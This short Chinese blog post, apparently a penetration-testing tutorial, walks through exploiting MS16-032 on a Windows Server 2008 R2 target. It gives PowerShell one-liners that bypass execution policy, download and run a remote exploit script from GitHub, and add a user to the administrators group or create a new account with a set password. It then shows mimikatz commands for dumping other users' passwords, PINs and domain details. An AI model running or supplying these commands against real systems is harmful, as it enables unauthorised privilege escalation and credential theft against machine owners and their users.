MS16-032漏洞利用

MS16-032漏洞利用

靶机:Windows server2008R2

1、 创建标准用户。创建用户zhuzhuxia,此用户为普通用户。在cmd下使用net user zhuzhuxia可以看到在*user组中。



2、 提权。使用MS16-032漏洞,使用powershell一句话提权,将zhuzhuxia这个用户放到管理员组中去。利用脚本如下:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators zhuzhuxia /add'"

执行完命令后,有如下提示,说明提权成功。


 再执行命令net user zhuzhuxia,zhuzhuxia这个用户已经归到管理员组。这时候就可以为所欲为了。

如下图所示。



此时还可以借助mimikatz工具来窃取本机其他账号和密码。使用管理员身份运行该程序。



打开mimikatz后,分别执行privilege::debug

sekurlsa::logonpasswords

执行完命令后,可以获取到其他用户和密码、PIN、所在域等信息.


PS:提权后执行某些进程或程序,如修改IP,需要输入密码访客执行,若不知道当前用户密码,可以执行命令创建用户sunwukong:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user sunwukong CVTE@123 /add'"

此用户为标准用户,可以再次使用步骤2提权即可。

你可能感兴趣的:(MS16-032漏洞利用)